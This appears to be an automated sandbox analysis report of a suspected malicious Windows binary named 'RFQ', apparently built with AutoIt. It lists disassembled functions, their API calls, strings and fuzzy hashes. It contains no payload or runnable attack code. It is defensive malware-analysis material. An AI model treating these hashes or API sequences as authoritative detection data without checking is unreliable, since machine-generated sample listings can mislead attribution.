                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                            • String ID: <$@
                                                                            • API String ID: 146682121-1426351568
                                                                            • Opcode ID: 3df02f3630ae071dd4db21fac2e6ac630262f0c8055537b96b8a34c80f976369
                                                                            • Instruction ID: 9c362d9c3869107d2b0e9665d35b051755a9c4d9ea58012fbf89200f0819e308
                                                                            • Opcode Fuzzy Hash: 3df02f3630ae071dd4db21fac2e6ac630262f0c8055537b96b8a34c80f976369
                                                                            • Instruction Fuzzy Hash: AB717A71A00219EFCB14EF94C495A9EBBF1BF08314F04869DE815AB792CB78ED41CB95
                                                                            Function 006E70F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006E715C
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006E7192
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006E71A3
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006E7225
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: 221634fba2618f8ce7d9236cd91c0418c30a6537a8883df02c66797c2d9aef01
                                                                            • Instruction ID: f83ec6d0e24eb08bed00632b33ec9ec820049fbb2d9c95b04053f1a1cbfb3879
                                                                            • Opcode Fuzzy Hash: 221634fba2618f8ce7d9236cd91c0418c30a6537a8883df02c66797c2d9aef01
                                                                            • Instruction Fuzzy Hash: 8341CEB1606344EFDF15CF95C884A9A7BAAEF44300B1480ADFE059F206D7B4DE45DBA0
                                                                            Function 00713CAF Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00713D68
                                                                            • IsMenu.USER32(?), ref: 00713D7D
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00713DC5
                                                                            • DrawMenuBar.USER32 ref: 00713DD8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                            • String ID: 0
                                                                            • API String ID: 3076010158-4108050209
                                                                            • Opcode ID: 6fd37258b1746c51554c140a8e8f09b859aad5b0d5f5e5cafa50dab87f698fe6
                                                                            • Instruction ID: 3520a0de334b1d4034b94644aa8a15a36fd7b138caae11e923b5f7f246c0df74
                                                                            • Opcode Fuzzy Hash: 6fd37258b1746c51554c140a8e8f09b859aad5b0d5f5e5cafa50dab87f698fe6
                                                                            • Instruction Fuzzy Hash: FD415E75A00209EFDB14DF58E884ADABBB5FF05354F148129E985A7290D339AE90CF60
                                                                            Function 006E1D26 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006E1DAA
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006E1DBD
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 006E1DED
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2081771294-1403004172
                                                                            • Opcode ID: f5f12d77bced7d4d2750e23d11bd0de211fd19d6be0cd2e2b172e43ca9ad0115
                                                                            • Instruction ID: 70c29acf1b7b5a8ee185094b748af2384ffbc122367e5441f143f72c6a26311a
                                                                            • Opcode Fuzzy Hash: f5f12d77bced7d4d2750e23d11bd0de211fd19d6be0cd2e2b172e43ca9ad0115
                                                                            • Instruction Fuzzy Hash: 3C210771A01244BFDB14ABA5CC49CFF776ADF46360B10415DF812AB2D1DB38490A9724
                                                                            Function 00712E4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00712EC0
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00712EC7
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00712EDC
                                                                            • DestroyWindow.USER32(?), ref: 00712EE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 3529120543-1011021900
                                                                            • Opcode ID: fd679129b5a7a8937cc017fa3f2136c597021a4969d0432ede938620fdde2692
                                                                            • Instruction ID: dc8f359321ef94d6311397e58058b6c354c4ff1ced8d7e72359b90fd84cb0664
                                                                            • Opcode Fuzzy Hash: fd679129b5a7a8937cc017fa3f2136c597021a4969d0432ede938620fdde2692
                                                                            • Instruction Fuzzy Hash: 5121AE71200205BFEB109F68DC48EFB37ADFB59364F108218FA50A61D1D739DCA69760
                                                                            Function 006A4CFD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006A4CAE,00000003,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002), ref: 006A4D1D
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006A4D30
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,006A4CAE,00000003,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002,00000000), ref: 006A4D53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: ed86ffed5ea18fc0f4b406668c22ce33d4b869aae64d917084762be8eef12aa3
                                                                            • Instruction ID: 2a5009928c12453c47e74ccf485ef26fb2b3bd1fc1c50760de15459da174f929
                                                                            • Opcode Fuzzy Hash: ed86ffed5ea18fc0f4b406668c22ce33d4b869aae64d917084762be8eef12aa3
                                                                            • Instruction Fuzzy Hash: 4CF0A43454021CBBDB116F94DC09BDDBBB5EF44751F0080A4F805A62A1CF755D40DE95
                                                                            Function 006DDB3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32 ref: 006DDB49
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006DDB5B
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 006DDB81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                            • API String ID: 145871493-2590602151
                                                                            • Opcode ID: 56f5eca5c0e603f771467180903eb74a2e758ff8fafb5d2feab5017cdd8c8b4a
                                                                            • Instruction ID: ae6c45e44798e4571a44ed2738ad21c83de16248a022ae418c2f82172176ce0f
                                                                            • Opcode Fuzzy Hash: 56f5eca5c0e603f771467180903eb74a2e758ff8fafb5d2feab5017cdd8c8b4a
                                                                            • Instruction Fuzzy Hash: 9DE02BF0C4A515ABDB32A7548C589ED761B9F00B09F1EC05BFC05E6380DB78CD85D694
                                                                            Function 00686832 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068683E
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00686850
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686862
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-3689287502
                                                                            • Opcode ID: 7baf3328f623680c49bbe8f0b9d40efaa69b32a4b1131232b02ade18eb9c68e7
                                                                            • Instruction ID: 201a605dac25bc6667b1d6ec78c0fbe239092f636366848e7de9adc7bd78e6ec
                                                                            • Opcode Fuzzy Hash: 7baf3328f623680c49bbe8f0b9d40efaa69b32a4b1131232b02ade18eb9c68e7
                                                                            • Instruction Fuzzy Hash: D5E086F16816216792222769AC0CADA66159F81F12B058125FD09D2280DF58CD0195B4
                                                                            Function 006867FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686804
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00686816
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686829
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 145871493-1355242751
                                                                            • Opcode ID: cc65cfb306771a50d4890d888560efaf8ca4023883399635a448d808b0c327a5
                                                                            • Instruction ID: 6cef6eb95408a2c4e09b190eed4adb41d5aca4c39c84cb9b49824c1fe237e556
                                                                            • Opcode Fuzzy Hash: cc65cfb306771a50d4890d888560efaf8ca4023883399635a448d808b0c327a5
                                                                            • Instruction Fuzzy Hash: 55D012B15C25216752332769EC189DE7E16DE8DF217058165BC09A2398DF29CD01D6F4
                                                                            Function 006F2865 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F2B23
                                                                            • DeleteFileW.KERNEL32(?), ref: 006F2BA5
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006F2BBB
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F2BCC
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F2BDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$Copy
                                                                            • String ID:
                                                                            • API String ID: 3226157194-0
                                                                            • Opcode ID: 0b1bfeec3d0f0a1be5a15fa0e683a8d7b9b80f1c3b2f756a49f912f23ca58b89
                                                                            • Instruction ID: fb00636da367ea4d5d6e11c38fb8b956ed7a99c35c7f9e4a4f2d7ec83d15e734
                                                                            • Opcode Fuzzy Hash: 0b1bfeec3d0f0a1be5a15fa0e683a8d7b9b80f1c3b2f756a49f912f23ca58b89
                                                                            • Instruction Fuzzy Hash: DAB170B190011EABDF55EFA4CC95EEEB77EEF45304F1040AAF609E6141EA319E448F64
                                                                            Function 0070A2AE Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 0070A34E
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0070A35C
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0070A38F
                                                                            • CloseHandle.KERNEL32(?), ref: 0070A564
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 3488606520-0
                                                                            • Opcode ID: 0bba0afb55ed9790b8b29bdf44a65a3992416191c6cda41ed13a17c871bce646
                                                                            • Instruction ID: 4316cc9237fe9f4a6be552e2e6f49a9cbe6427a7bf9d3b936ed27af32b3aeea8
                                                                            • Opcode Fuzzy Hash: 0bba0afb55ed9790b8b29bdf44a65a3992416191c6cda41ed13a17c871bce646
                                                                            • Instruction Fuzzy Hash: E5A19DB1604301AFD760EF28C886F2AB7E6AF44710F14895CF5999B3D2D7B5ED408B86
                                                                            Function 006EE319 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006ECE40,?), ref: 006EDD1B
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006ECE40,?), ref: 006EDD34
                                                                              • Part of subcall function 006EE0B7: GetFileAttributesW.KERNEL32(?,006ECEB3), ref: 006EE0B8
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006EE391
                                                                            • MoveFileW.KERNEL32(?,?), ref: 006EE3CA
                                                                            • _wcslen.LIBCMT ref: 006EE509
                                                                            • _wcslen.LIBCMT ref: 006EE521
                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 006EE56E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3183298772-0
                                                                            • Opcode ID: 63df803bd50539a2cb153d0448c0fd478fd5aa3a5ca6aa5aaefe1365569d968e
                                                                            • Instruction ID: 7abd2ac2949d99a82a7cefee7a57a4c7f071ce5a1e38be7fa99b0654281297f6
                                                                            • Opcode Fuzzy Hash: 63df803bd50539a2cb153d0448c0fd478fd5aa3a5ca6aa5aaefe1365569d968e
                                                                            • Instruction Fuzzy Hash: 1C51C4B20093859BC764EB95CC809DF73EEAF85340F00492EF585C3191EF71A688CB5A
                                                                            Function 0070B8F0 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070B9CC
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0070BA27
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0070BA8A
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0070BACD
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070BADA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 826366716-0
                                                                            • Opcode ID: 0473d679cd3be4c9f45e7bf436c7fde727a38269c9763c567741e0158a3674fe
                                                                            • Instruction ID: e8768b9c95e8f0e551403e5977ca755846d3b025122bc3697a1d0f571e0ed47d
                                                                            • Opcode Fuzzy Hash: 0473d679cd3be4c9f45e7bf436c7fde727a38269c9763c567741e0158a3674fe
                                                                            • Instruction Fuzzy Hash: 9E61AE71218241EFC314DF64C894E2ABBE5FF84318F14865DF0998B2A2DB35EE45CB92
                                                                            Function 006E8B06 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 006E8B23
                                                                            • VariantClear.OLEAUT32 ref: 006E8B94
                                                                            • VariantClear.OLEAUT32 ref: 006E8BF3
                                                                            • VariantClear.OLEAUT32(?), ref: 006E8C66
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006E8C91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                            • String ID:
                                                                            • API String ID: 4136290138-0
                                                                            • Opcode ID: ad316e60d2b2efea029db4d3b19c7c5b7be17b3be700d4897e64e2d3c2adba47
                                                                            • Instruction ID: 0684a0315853709c604031a8992a1aeb5f9463bc779aa307cc442cb1df594f5c
                                                                            • Opcode Fuzzy Hash: ad316e60d2b2efea029db4d3b19c7c5b7be17b3be700d4897e64e2d3c2adba47
                                                                            • Instruction Fuzzy Hash: FB517CB5A01759DFCB10CF69C884AAAB7F9FF89710B118569E909DB310D734E911CFA0
                                                                            Function 006F8A19 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006F8ACC
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 006F8AF8
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006F8B50
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006F8B75
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006F8B7D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
